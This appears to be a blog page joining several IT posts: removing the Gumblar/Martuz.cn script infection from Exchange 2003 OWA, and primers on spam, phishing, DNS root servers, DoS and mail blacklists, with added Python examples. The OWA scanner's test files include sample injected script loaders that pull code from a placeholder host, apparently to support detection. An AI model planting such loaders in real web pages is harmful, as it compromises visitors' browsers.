Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slow after login and how to fix this problem.
Martuz.cn / Gumblar Exploit root cause of the OWA problem
Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days, Outlook Web Access on one of our main Exchange 2003 servers became painfully slow. After login, the main browser window in Internet Explorer displayed only the vertical bar that separates the folder list from the message area, got stuck there for about 30 seconds, and then finally loaded the rest of the page. Double-clicking to open a message popped open a blank message window showing http://your servername…. in the lower left status bar, and only after about 30 seconds did the window load. The same thing happened when composing a new mail message in OWA. Everything worked normally except that tasks became slower for users in OWA.
Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security, which did not report any viruses, Trojans or spyware on the Exchange 2003 server. Looking further into the situation, we noticed that when the Outlook Web Access browser window opened, the status bar would display http://yourservername…. and then change to http://martuz.cn/vid/… for a few seconds before the OWA window finally opened. This indicated some kind of infection. Our analysis showed that OWA was running an infected JavaScript embedded within the OWA pages, which caused the problem. Apparently Symantec Endpoint Security had no clue about this infection, and we are still unsure how the server got infected. Googling and researching the issue, we have seen reports of a PHP exploit or an FTP exploit as the cause of the infection.
Martuz.cn JavaScript virus infection removal
First of all, to see whether you have the same problem described here, log into an OWA account and watch the message at the bottom left of the browser's status bar after login. It will say “Waiting for http://yourservername/exchange”; if at any point it changes to waiting for http://martuz.cn… and then disappears, you have the same problem.
Download the trial version of Microsoft Forefront Client Security and install it on the server; we left Symantec Endpoint Security running at the same time without any problem. For a quick check, scan only the Exchange installation folder on your server. If you see a message related to the Gumblar Trojan, your server is infected. Infected files will be in \Exchsrvr\exchweb\controls and/or D:\Exchsrvr\exchweb\6.5.7651.60, or something similar. Back up the entire exchweb folder just in case. Choose the option to remove the infected files. Then re-install the Exchange 2003 Service Pack, which re-populates the files removed by the anti-virus software.
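The status-bar check above is manual; the same symptom (an OWA page pulling a script from a host that is not your own server) can be found by scanning the exchweb folder for references to unexpected hosts. The script below is an added example, not part of the original post: it walks a web folder, extracts every http/https host named in the files, and reports the ones missing from an allow-list. The allow-list, the folder layout and the file contents are constructed for the demo (your own server name goes in ALLOWED_HOSTS); the injected-loader samples are made-up placeholders, not the real injected code.

```python
"""Added example: report OWA web files that name script hosts outside an allow-list.
Folder layout, file contents and the allow-list are constructed for this demo."""
import os
import re
import tempfile
from urllib.parse import unquote

# Absolute URL -> capture the host part.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Hosts an unmodified OWA page may legitimately name (assumed for this demo;
# replace with your own server name(s)).
ALLOWED_HOSTS = {"owa.corp.example", "schemas.microsoft.com", "www.w3.org"}

WEB_EXTENSIONS = (".htm", ".html", ".js", ".asp", ".aspx", ".xsl")


def unexpected_hosts(line, allowed_hosts=ALLOWED_HOSTS):
    """Hosts referenced on this line that are not on the allow-list.
    Injected loaders often hide the tag inside unescape("%3Cscript%20src%3D..."),
    so the percent-decoded form of the line is searched as well."""
    text = line + "\n" + unquote(line)
    return sorted({h.lower() for h in URL_RE.findall(text)
                   if h.lower() not in allowed_hosts})


def scan_web_folder(root_dir, allowed_hosts=ALLOWED_HOSTS):
    """Return (relative path, line number, host) for every unexpected host found."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            # OWA 2003 files are mostly ASCII; latin-1 never raises on stray bytes.
            with open(path, encoding="latin-1") as fh:
                for lineno, line in enumerate(fh, 1):
                    for host in unexpected_hosts(line, allowed_hosts):
                        rel = os.path.relpath(path, root_dir).replace(os.sep, "/")
                        findings.append((rel, lineno, host))
    return findings


def build_sample_tree():
    """Constructed mini 'exchweb' tree: one clean page, one file with a plain
    injected loader, one with the loader percent-encoded inside unescape()."""
    root = tempfile.mkdtemp(prefix="exchweb_")
    os.makedirs(os.path.join(root, "controls"))
    files = {
        "controls/clean.htm":
            '<html xmlns="http://www.w3.org/1999/xhtml">\n'
            '<script src="http://owa.corp.example/exchweb/controls/util.js"></script>\n',
        "controls/injected.js":          # constructed placeholder host, not a real loader
            'function ok() {}\n'
            'document.write(\'<script src="http://malicious-host.example/loader.js"></script>\');\n',
        "controls/encoded.htm":          # same placeholder, percent-encoded
            'document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F'
            'malicious-host.example%2Fl.js%22%3E%3C%2Fscript%3E"));\n',
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, lineno, host in scan_web_folder(build_sample_tree()):
        print(f"{rel}:{lineno}: unexpected script host {host}")
```

Run it against a copy of the exchweb folder with ALLOWED_HOSTS set to your server's names; any file it reports is one to compare against the Service Pack originals before deciding it is clean.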
Summary:
Martuz.cn / Gumblar is a JavaScript exploit that inserts itself into the legitimate OWA files. There is no definitively known cause of how this virus gets installed on the server. Microsoft Forefront Client Security seems to do a good job of detecting and removing the virus. You need to re-install the service pack in order to re-introduce the files removed during virus removal.
What is Phishing?
Phishing is a fraudulent act committed by individuals who want to gain access to sensitive personal information for an array of purposes. Contrary to what many believe, one of the best ways you can protect yourself from phishing isn’t to install defense programs or increase security measures, but to learn how to recognize a phish.
The most common form of phishing uses email. These emails usually appear to originate from a well organized financial establishment and ask for personal information that, if placed in the wrong hands, automatically puts you at great risk. A “legitimate” phish will most likely ask you at some point for your credit card number, social security number, account number or password. Many times phishing efforts seem to come from sites with which you do not even have an account, giving you all the more evidence to determine whether the email is indeed a phishing attempt. It isn’t uncommon for a phishing email to instruct you to click on a link that redirects you to a site where you’re expected to enter personal information. Authentic organizations should and will never ask you to confirm this information via email.
High Cost Effects of Spam on Businesses
What is Spam?
Spam can be generalized and defined as unsolicited email that’s usually sent out to many email addresses in bulk. Spam emailers have created their own “gated” community within the Internet; they’ve separated themselves from all politics and rules pertaining to the Internet and have constructed their own methods. Spam is produced by all sorts of individuals and organizations in order to reach a wide audience, as they use this method to send endless amounts of emails and advertisements that flood your mailboxes on a daily basis.
Effects on Businesses
It isn’t a secret that many businesses rely heavily on the Internet, which allows them to grow and expand as time progresses. However, if a business’s backbone is the Internet, then bandwidth is in turn the Internet’s backbone and support. When a message is sent to a network, that action takes up bandwidth; the amount of bandwidth used depends on the size and the quantity of the messages. A larger than usual message or mass quantities of messages will normally take up a great deal of bandwidth, which consequently will slow down a business’s network and Internet connection.
Some studies suspect spam of accounting for as much as 50% of some businesses’ network traffic, which means these businesses are only using about 50% of their resources, possibly hindering their growth and increasing unnecessary expenditure. It can be a mission at times to reduce or even eliminate spam; however, obtaining the right spam filter is the solution. Spam filters rely on a set of rules, regulations and, if I may say so, “politics” in order to catch and filter out the unwanted emails. Determining your business’s needs and assessing the budget is one of the first steps in gaining control of unwanted emails.
DNS Root Name Servers Explained
A DNS root name server is a server that answers on behalf of the DNS root zone, and redirects requests for a given TLD (Top Level Domain) to that particular TLD’s name servers. The term “root name server” is normally used to describe the thirteen organizations often referred to as the “root server operators”. They implement the root namespace domain for the Internet’s official universal implementation of the Domain Name System. The original thirteen members, in alphabetical order, are: A - VeriSign Global Registry Services; B - Information Sciences Institute; C - Cogent Communications; D - University of Maryland; E - NASA Ames Research Center; F - Internet Systems Consortium, Inc.; G - U.S. DOD Network Information Center; H - U.S. Army Research Lab; I - Autonomica/NORDUnet; J - VeriSign Global Registry Services; K - RIPE NCC; L - ICANN; M - WIDE Project.
Incidentally, the letters A-M represent the 13 numeric IPv4 addresses at which the service is provided. Each operator is tasked with providing consistent DNS service to the Internet from their specific address.
The empty string after the final dot in a domain name is called the root domain, and all other domains, like .org, .net, etc., are enclosed within the root domain. A computer connected to the Internet resolves a domain name by starting from the rightmost label and working its way left, asking each name server about the next label to the left. The root name servers know which servers are responsible for the top-level domains like .com and .org, which have their own servers. The resolver then queries the name servers responsible for particular domain names, which in turn answer queries for the IP addresses of subdomains.
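The right-to-left walk described above, as an added example that is not part of the original article: a toy iterative resolver over a constructed, in-memory delegation tree. It starts at the root zone, gets a referral for the TLD, follows it to the domain's own name servers, and only there receives an address; a name nobody is authoritative for ends in NXDOMAIN at the zone that lacks it. No network is used, and every zone, name server and address is made up.

```python
"""Added example: iterative resolution over a constructed delegation tree.
zone -> {name: (record type, values)}; NS entries are referrals to a child
zone, A entries are answers. All data below is made up for the demo."""
ZONES = {
    ".": {
        "com.": ("NS", ["ns.com-tld.example."]),
        "org.": ("NS", ["ns.org-tld.example."]),
    },
    "com.": {"example.com.": ("NS", ["ns1.example.com."])},
    "org.": {"example.org.": ("NS", ["ns1.example.org."])},
    "example.com.": {
        "example.com.": ("A", ["192.0.2.1"]),        # zone apex
        "www.example.com.": ("A", ["192.0.2.10"]),
        "mail.example.com.": ("A", ["192.0.2.25"]),
    },
    "example.org.": {"www.example.org.": ("A", ["198.51.100.7"])},
}


def suffixes(name):
    """Ancestors of a name, rightmost label first:
    'www.example.com.' -> ['com.', 'example.com.', 'www.example.com.']"""
    labels = name.rstrip(".").split(".")
    return [".".join(labels[i:]) + "." for i in range(len(labels) - 1, -1, -1)]


def resolve(name, zones=ZONES):
    """Return (address or None, trail); trail lists (zone asked, name asked, reply)."""
    name = name.rstrip(".").lower() + "."
    zone, trail, pending = ".", [], suffixes(name)
    for _ in range(32):                     # hard bound so a looping delegation cannot hang us
        if not pending:
            break
        qname = pending[0]
        records = zones.get(zone, {}).get(qname)
        if records is None:                 # authoritative zone knows no such name
            trail.append((zone, qname, "NXDOMAIN"))
            return None, trail
        rtype, values = records
        if rtype == "A":
            trail.append((zone, qname, "A " + values[0]))
            return values[0], trail
        trail.append((zone, qname, "NS " + values[0]))   # referral one level down
        if zone == qname:                   # a zone referring to itself: no address to be had
            return None, trail
        zone = qname
        if qname != name:
            pending = pending[1:]           # otherwise re-ask the child zone for its own apex
    return None, trail


if __name__ == "__main__":
    for host in ["www.example.com", "example.com", "www.example.net"]:
        addr, trail = resolve(host)
        print(host, "->", addr)
        for asked_zone, qname, reply in trail:
            print(f"   ask {asked_zone:<14} for {qname:<18} -> {reply}")
```

The trail for www.example.com shows exactly three hops (root, com, example.com), which is why a broken or missing delegation at any one level makes every name beneath it unreachable.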
Common Mail Server Configuration Mistakes
1. Installation on Unsupported Hardware
Unless there is a very good reason not to, always install Exchange on hardware supported by Microsoft. Consult Microsoft’s Windows Server Catalog (formerly the “Hardware Compatibility List,” or HCL) for a complete list of compatible, supported hardware. In order for a system to be considered supported, it must be listed in the Windows Server Catalog. Systems containing some supported and some unsupported components are considered unsupported by Microsoft. In addition to ensuring a smoother installation or upgrade, using supported hardware also means you will receive better technical support from Microsoft or other vendors should the need arise in the future. Using unsupported hardware can cause problems ranging from intermittent mail outages to total and complete loss of data.
- Exchange Server 2007 requires both 64-bit hardware and 64-bit Windows. See “Exchange 2007: Frequently Asked Questions” for more information.
- Exchange Server 2003 cannot run on 64-bit Windows. See “Choosing Exchange Server 2003 Hardware for Reuse with Exchange Server 2007” for recommendations from Microsoft on choosing the best hardware for Exchange.
- See “Microsoft support policy on hardware not in the Windows Catalog (Windows HCL)” (KB142865) for more information on Microsoft’s position on unsupported hardware.
2. Misconfigured DNS
Because Exchange relies heavily on both Active Directory and DNS, a simple configuration problem in either one will cause major headaches for your new or upgraded Exchange environment. Here are a few of the common configuration mistakes when it comes to DNS and your Exchange environment:
- All Windows 2000 Servers must be on Service Pack 3, or be running Windows Server 2003, including Global Catalogs (GCs). It is also Microsoft’s recommendation that at least one GC be placed in each site containing an Exchange mail server.
- Verify that your Mail Exchanger (MX) records are correct and that no MX record points to the Fully Qualified Domain Name (FQDN) of an Exchange server. See “How to Verify that MX Records Do Not Point to the FQDN of an Exchange Server.”
- If it exists, remove the root zone under Forward Lookup Zones in the DNS management console, as it will prevent Exchange from sending outbound mail. See “How To Remove the Root Zone (Dot Zone)” (KB298148) and “‘Host Unknown’ message when sending outbound Internet mail” (KB289045) for information on removing the root (AKA “dot”) zone.
- See “Exchange Server 2003: Verifying DNS Design and Configuration” for more information on verifying your DNS configuration.
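Two of the checks above (MX targets versus Exchange FQDNs, and the root zone in Forward Lookup Zones) can be scripted. The following is an added example, not code from the article or from Microsoft: it parses the text a Windows nslookup -type=MX query prints, flags any MX target that equals the FQDN of an Exchange server, notes a target for which no address record came back, and warns if the zone list contains the root (".") zone. The nslookup output, server names and zone list are constructed for the demo; the set of Exchange FQDNs is something you supply.

```python
"""Added example: audit MX records and the forward zone list for the two DNS
mistakes described in the text. Sample nslookup output and names are constructed."""
import re

# Shapes of the two interesting lines in Windows 'nslookup -type=MX' output.
MX_RE = re.compile(r"^(\S+)\s+MX preference = (\d+), mail exchanger = (\S+)$")
A_RE = re.compile(r"^(\S+)\s+internet address = (\S+)$")

SAMPLE_NSLOOKUP = """\
Server:  dc1.corp.example
Address:  192.0.2.5

corp.example    MX preference = 10, mail exchanger = mail.corp.example
corp.example    MX preference = 20, mail exchanger = exch01.corp.example
mail.corp.example       internet address = 192.0.2.25
"""


def parse_nslookup_mx(text):
    """Return ([(preference, exchanger)], {host: address}) from nslookup output."""
    mx, addrs = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        m = MX_RE.match(line)
        if m:
            mx.append((int(m.group(2)), m.group(3).rstrip(".").lower()))
            continue
        a = A_RE.match(line)
        if a:
            addrs[a.group(1).rstrip(".").lower()] = a.group(2)
    return sorted(mx), addrs


def audit(nslookup_text, exchange_fqdns, forward_zones):
    """List of findings; empty means the two checks passed."""
    issues = []
    mx, addrs = parse_nslookup_mx(nslookup_text)
    exch = {f.rstrip(".").lower() for f in exchange_fqdns}
    if not mx:
        issues.append("no MX records found in the answer")
    for pref, host in mx:
        if host in exch:
            issues.append(f"MX {pref} points to the FQDN of an Exchange server: {host}")
        if host not in addrs:   # extra sanity check: the target should resolve
            issues.append(f"MX {pref} target {host} has no address record in the answer")
    if "." in {z.strip() for z in forward_zones}:
        issues.append("root ('.') zone present in Forward Lookup Zones: outbound mail will fail")
    return issues


if __name__ == "__main__":
    for issue in audit(SAMPLE_NSLOOKUP, {"EXCH01.corp.example"}, ["corp.example", "."]):
        print("FINDING:", issue)
```

Paste the real nslookup output in place of SAMPLE_NSLOOKUP and list the zones shown in the DNS console; anything printed is one of the mistakes the KB articles above address.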
What is a DoS (Denial of Service) attack?
A denial of service (DoS) attack is an attempt to deny a user from accessing the available computer resources and services. It can be targeted towards a single system or a group of systems. In the event that a great number of systems are attacked, it’s called a distributed denial-of-service attack (DDoS).
Whereas the motives and means of carrying out the attacks are varied, the primary goal is to deny legitimate users from accessing information, resources and services.
A denial of service attack is typically carried out by an individual or group of individuals who deliberately prevent a computer system from functioning properly using various means. They usually target Internet sites or services hosted on reputable web servers. Common sites and services prone to attack are banks, DNS root name servers and online payment gateways.
Perpetrators of DoS attacks use various means and methods to carry out their acts. There are typically two kinds of attack, wired and wireless: wired attacks are carried out over wired networks, whereas wireless attacks are carried out over wireless networks.
RBL vs White List
RBL
RBL is an abbreviation for “Real-time Black List”. An RBL is a list of ‘known’ SMTP servers notorious for sending SPAM. The list is regularly updated with new potentially harmful entities. These entities might be domain names, IP addresses and viruses that are known to cause, or are associated with, potentially harmful activities. When the user receives a message, the email server can look at the IP address of the originating SMTP server and search for it in a black list. If the IP address is found in the black list, traffic from that particular IP address is automatically blocked.
In the past, blacklist solutions came in the form of software. Traditionally, there existed only two major forms of software that used Real Time Black Lists: antivirus and anti-spyware software. However, new advanced blacklist solutions which use heuristics, like the DNSBL (DNS Black List), have come up.
There are many advantages associated with using Real-time Black Lists; one major advantage of RBLs is that they don’t entail any major work from the user. You don’t need to have specialty training. Other advantages include automatic updating of the blacklist, total security against known threats, and no need for definition file updates. It also acts as an extra layer of protection because it does not rely entirely on definition files.
However, there are some drawbacks associated with using Real Time Black Lists. Your network is left under the control of a third-party vendor, and constantly updating the list might consume a good chunk of the available bandwidth. A large email from a good source might be mistakenly deleted or blocked. The scanning of all incoming and outgoing IP traffic might slow down the system. Workstations and networks might be vulnerable to day-zero attacks.
White list
A white list is a list of accepted e-mail addresses or domain names/IP addresses that the user deems acceptable to receive email from and that should not be deleted. The most popular kind is the e-mail white list. E-mail white lists contain a list of e-mail addresses or domain names from which e-mail blocking software will allow traffic to be received. The white list is an option for those who don’t like using Real Time Black Lists.
There are many advantages associated with using a white list. The system performs faster because there is no constant scanning of outgoing or incoming traffic. You don’t need to install unlicensed software. No executable programs like spyware or Trojan horses will ever get installed on your system. There is also no need for virus or spyware definition updates; therefore, systems are constantly protected from day-zero virus attacks.
One drawback of using a white list is that you might miss an important message from a credible source that you have not included in the white list.
Bayesian Spam filters
The contents of the emails that spammers have been sending within the past few years have been evolving with incredible craftiness. These emails seem to get past the simple-minded spam filters that we keep installing. We read spam, curse spam, and have come to hate spam, but what if there was a spam filter that evolved along with the endlessly developing spam, staying one step ahead every time?
What is the origin of Bayesian Spam Filters?
There was a man who lived from 1702 to 1761 whose name was Thomas Bayes, an English Presbyterian minister and mathematician. After he died, the Royal Society published one of his most important findings in 1763 in the Philosophical Transactions. His finding, simply stated, is that if a deadly disease existed such as Cluvitis (non-existent) and its symptoms were fever, runny nose, toothache, and more, then just because you manage to get a runny nose doesn’t mean you have Cluvitis. However, if you were to acquire another of the symptoms in that series, such as a fever, then this would greatly increase the chances that you have Cluvitis.
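To put numbers on the Cluvitis illustration (this worked calculation is added here and is not from the original post; all probabilities are assumed for illustration), let D mean "has Cluvitis", R "has a runny nose" and F "has a fever":

```latex
\text{Assumed: } P(D)=0.01,\quad P(R\mid D)=0.9,\ P(R\mid \neg D)=0.3,\quad P(F\mid D)=0.8,\ P(F\mid \neg D)=0.05

P(D\mid R) = \frac{P(R\mid D)\,P(D)}{P(R\mid D)\,P(D) + P(R\mid \neg D)\,P(\neg D)}
           = \frac{0.9\cdot 0.01}{0.9\cdot 0.01 + 0.3\cdot 0.99}
           = \frac{0.009}{0.306} \approx 0.029

P(D\mid R,F) = \frac{P(D)\,P(R\mid D)\,P(F\mid D)}{P(D)\,P(R\mid D)\,P(F\mid D) + P(\neg D)\,P(R\mid \neg D)\,P(F\mid \neg D)}
             = \frac{0.01\cdot 0.9\cdot 0.8}{0.01\cdot 0.9\cdot 0.8 + 0.99\cdot 0.3\cdot 0.05}
             = \frac{0.0072}{0.0072 + 0.01485} \approx 0.327
```

A runny nose alone moves the chance of Cluvitis from 1% to about 3%; adding a fever moves it to about 33%. The second line assumes the symptoms are conditionally independent given D, which is exactly the "naive" assumption a Bayesian spam filter makes about the words in a message, treating each word as a symptom of spam.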
Spam - Small Business
Dealing Effectively with Spam
Any business that believes spam is merely an annoyance in the office is sadly mistaken. A 2007 report by Nucleus Research shows that spam costs organizations in the United States $712 per employee every year. According to Nucleus, that adds up to an estimated $70 billion annually in lost productivity. The time employees spend going through their inbox trying to distinguish junk mail from messages that require a response is valuable time that could be spent on more important tasks. Not only that, the ever-growing flood of email taxes the corporate network by gobbling up disk storage, bandwidth and other precious resources. Trying to manage all the extra email and find a solution to the problem could also have a tremendous impact, particularly on a small business.
Things are grim, and while it looks as if spam is here to stay, there are a few ways you can minimize the effect it has on your business.
Spam Filter Blacklists and Whitelists
In order to be effective at distinguishing spam from legitimate emails, a spam filter needs to rely on various methods. Some of today’s most popular programs utilize blacklists and whitelists to filter out junk mail. As you’ve probably guessed, these counterparts are the exact opposite of one another: senders listed on the blacklist are denied access to a particular email address, while those on the whitelist are allowed. When combined with techniques such as Bayesian filtering and pattern matching, these lists better ensure that a much lower volume of spam reaches your inbox.
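The Bayesian filtering mentioned here, and the "evolving" filter the Bayesian Spam filters section asks for, is a classifier that learns from the mail it is shown. The code below is an added example, not part of either post: a minimal naive Bayes filter that records, per word, how many spam and how many legitimate messages contained it, then combines that evidence with Bayes' rule (in log-odds, so long messages do not underflow). Laplace smoothing keeps a never-seen word from forcing a probability of exactly zero. The eight training messages are constructed for the demo.

```python
"""Added example: a minimal Bayesian spam filter over word presence.
Training messages below are constructed for the demo."""
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9]+")


def tokenize(text):
    """Distinct lower-case words in a message; presence matters, repeats do not."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesFilter:
    def __init__(self, alpha=1.0):
        self.alpha = alpha                   # Laplace smoothing: unseen words never get P = 0
        self.docs = Counter()                # messages seen per label
        self.words = {"spam": Counter(), "ham": Counter()}   # messages containing word, per label

    def train(self, text, label):
        self.docs[label] += 1
        self.words[label].update(tokenize(text))

    def word_prob(self, word, label):
        """Smoothed P(word appears in a message | label)."""
        return (self.words[label][word] + self.alpha) / (self.docs[label] + 2 * self.alpha)

    def spam_probability(self, text):
        """P(spam | words), assuming words are independent given the label."""
        if not self.docs["spam"] or not self.docs["ham"]:
            raise ValueError("need training examples of both classes")
        log_odds = math.log(self.docs["spam"] / self.docs["ham"])   # prior odds
        known = set(self.words["spam"]) | set(self.words["ham"])
        for word in tokenize(text) & known:  # words never seen in training carry no evidence
            log_odds += (math.log(self.word_prob(word, "spam"))
                         - math.log(self.word_prob(word, "ham")))
        return 1.0 / (1.0 + math.exp(-log_odds))

    def classify(self, text, threshold=0.5):
        return "spam" if self.spam_probability(text) >= threshold else "ham"


def train_sample_filter():
    """Constructed training set: four junk messages, four legitimate ones."""
    f = BayesFilter()
    for text in ["FREE pills, cheap prices, click here now",
                 "Win a free prize, click now to claim",
                 "cheap meds free shipping order now",
                 "Click here for your free money prize"]:
        f.train(text, "spam")
    for text in ["Can we move the project meeting to tomorrow",
                 "Attached are the notes from today's review",
                 "Please review the attached budget before the meeting",
                 "Lunch tomorrow? Let me know"]:
        f.train(text, "ham")
    return f


if __name__ == "__main__":
    f = train_sample_filter()
    for msg in ["free pills cheap click now", "notes from the project review meeting"]:
        print(f"{f.spam_probability(msg):.3f}  {f.classify(msg):<4}  {msg}")
```

The filter "evolves" simply by calling train() on every message the user files as spam or not spam; a word the spammers start using shows up in the spam counts the next time it is seen, with no definition update needed.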
Types of Blacklists
Whitelists are pretty cut and dried, but blacklists come in many different forms. Below are details on some of the most common types of blacklists:
IP Blockers: IP blacklists, or blackhole lists, are huge repositories of IP addresses known for distributing spam. The organizations who manage these repositories use a variety of mechanisms to find out who is sending spam. These techniques range from human reporting to setting up decoy email accounts. Many spam filters are configured to examine incoming email and trace its origin. If it comes from the IP address of a known spammer, it is flagged accordingly and moved to a quarantine folder. IP addresses can be blocked per email server, per local machine or for an entire country.
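The IP blocker described here and the RBL/white list comparison earlier on the page both come down to one lookup order at the mail server: consult the administrator's white list first, then the DNS-based blacklist. The code below is an added example, not part of either post, showing how a DNSBL is actually consulted: the sender's address has its octets reversed and the list's zone appended, and a DNS answer in 127.0.0.x means "listed" (the last octet encoding the reason, a convention many public lists follow). The DNSBL here is a constructed in-memory table so the example runs offline; a real deployment would resolve the query name with a DNS lookup instead. All addresses, domains and list entries are made up.

```python
"""Added example: white list first, then a DNSBL lookup. The list data is a
constructed table standing in for real DNS answers."""
import ipaddress

DNSBL_ZONE = "bl.example"                  # constructed list zone
DNSBL_ANSWERS = {                          # query name -> A record the list would return
    "44.2.0.192.bl.example": "127.0.0.2",
    "9.100.51.198.bl.example": "127.0.0.4",
}
LISTING_REASONS = {"127.0.0.2": "spam source", "127.0.0.4": "open relay"}


def dnsbl_query_name(ip, zone=DNSBL_ZONE):
    """Name a DNSBL is asked about: octets reversed, then the list's zone.
    192.0.2.44 -> 44.2.0.192.bl.example"""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def dnsbl_lookup(ip, zone=DNSBL_ZONE, answers=DNSBL_ANSWERS):
    """Listing reason, or None when the address is not on the list.
    Against a real list, replace the dict lookup by resolving the query name."""
    code = answers.get(dnsbl_query_name(ip, zone))
    if code is None:
        return None
    return LISTING_REASONS.get(code, "listed (" + code + ")")


def decide(sender_ip, sender_addr, wl_addrs=(), wl_domains=(), wl_networks=()):
    """White list beats black list: a sender the admin chose to trust is accepted
    even if a third-party list names its address. Returns (verdict, reason)."""
    addr = sender_addr.lower()
    domain = addr.rpartition("@")[2]
    if addr in {a.lower() for a in wl_addrs} or domain in {d.lower() for d in wl_domains}:
        return "accept", "sender on whitelist"
    ip = ipaddress.IPv4Address(sender_ip)
    if any(ip in ipaddress.ip_network(net) for net in wl_networks):
        return "accept", "address on whitelist"
    reason = dnsbl_lookup(sender_ip)
    if reason is not None:
        return "reject", f"{sender_ip} listed in {DNSBL_ZONE}: {reason}"
    return "accept", "not listed"


if __name__ == "__main__":
    print(decide("192.0.2.44", "bob@partner.example", wl_domains=["partner.example"]))
    print(decide("192.0.2.44", "someone@random.example"))
    print(decide("203.0.113.5", "someone@random.example"))
```

The first call shows the trade-off both sections describe: the same listed address is accepted because its domain is on the white list, which is what rescues a "large email from a good source" the list would otherwise block, and also why the white list needs to be maintained.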

